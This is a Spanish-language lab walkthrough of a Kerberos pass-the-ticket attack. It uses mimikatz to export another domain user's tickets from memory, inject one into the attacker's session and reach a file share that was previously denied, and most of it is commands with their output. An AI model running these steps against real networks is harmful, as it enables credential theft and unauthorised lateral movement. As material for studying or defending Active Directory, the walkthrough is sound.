Este ataque se puede realizar cuando un usuario logueado en la máquina que tenemos comprometida, puede acceder a algún recurso compartido al cual nosotros no tenemos permiso, en este ejemplo estamos como el usuario jen y no tenemos acceso al recurso \\\\web04\\backup pero el usuario dave si.

PS C:\\Windows\\system32> whoami
corp\\jen
PS C:\\Windows\\system32> ls \\\\web04\\backup
ls : Access to the path '\\\\web04\\backup' is denied.
At line:1 char:1
+ ls \\\\web04\\backup
+ ~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (\\\\web04\\backup:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

Ejecutamos mimikatz con los modulos correspondientes

mimikatz #privilege::debug
Privilege '20' OK

mimikatz #sekurlsa::tickets /export

Authentication Id : 0 ; 2037286 (00000000:001f1626)
Session           : Batch from 0
User Name         : dave
Domain            : CORP
Logon Server      : DC1
Logon Time        : 9/14/2022 6:24:17 AM
SID               : S-1-5-21-1987370270-658905905-1781884369-1103

         * Username : dave
         * Domain   : CORP.COM
         * Password : (null)

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 9/14/2022 6:24:17 AM ; 9/14/2022 4:24:17 PM ; 9/21/2022 6:24:17 AM
           Service Name (02) : krbtgt ; CORP.COM ; @ CORP.COM
           Target Name  (02) : krbtgt ; CORP ; @ CORP.COM
           Client Name  (01) : dave ; @ CORP.COM ( CORP )
           Flags 40c10000    : name_canonicalize ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             f0259e075fa30e8476836936647cdabc719fe245ba29d4b60528f04196745fe6
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;1f1626][email protected] !
...

Esto nos habrá exportado los tickets del usuario dave en formato mimikatz, con extensión .kirbi

PS C:\\Tools> dir *.kirbi

    Directory: C:\\Tools

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/14/2022   6:24 AM           1561 [0;12bd0][email protected]
-a----        9/14/2022   6:24 AM           1505 [0;12bd0][email protected]
-a----        9/14/2022   6:24 AM           1561 [0;1c6860][email protected]
-a----        9/14/2022   6:24 AM           1505 [0;1c6860][email protected]
-a----        9/14/2022   6:24 AM           1561 [0;1c7bcc][email protected]
-a----        9/14/2022   6:24 AM           1505 [0;1c7bcc][email protected]
-a----        9/14/2022   6:24 AM           1561 [0;1c933d][email protected]
-a----        9/14/2022   6:24 AM           1505 [0;1c933d][email protected]
-a----        9/14/2022   6:24 AM           1561 [0;1ca6c2][email protected]
-a----        9/14/2022   6:24 AM           1505 [0;1ca6c2][email protected]
...

Ahora volvemos a mimikatz, y cogemos el nombre de cualquier archivo .kirbi del usuario dave, esto nos cargará el ticket a nuestro usuario

mimikatz # kerberos::ptt [0;12bd0][email protected]

* File: '[0;12bd0][email protected]': OK

Comprobamos con klist

PS C:\\Tools> klist

Current LogonId is 0:0x13bca7

Cached Tickets: (1)

#0>     Client: dave @ CORP.COM
        Server: cifs/web04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
        Start Time: 9/14/2022 5:31:32 (local)
        End Time:   9/14/2022 15:31:13 (local)
        Renew Time: 9/21/2022 5:31:13 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

Y ahora ya podemos acceder al recurso compartido al cual no teniamos acceso, pero dave si

PS C:\\Tools> ls \\\\web04\\backup

    Directory: \\\\web04\\backup

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/13/2022   2:52 AM              0 backup_schemata.txt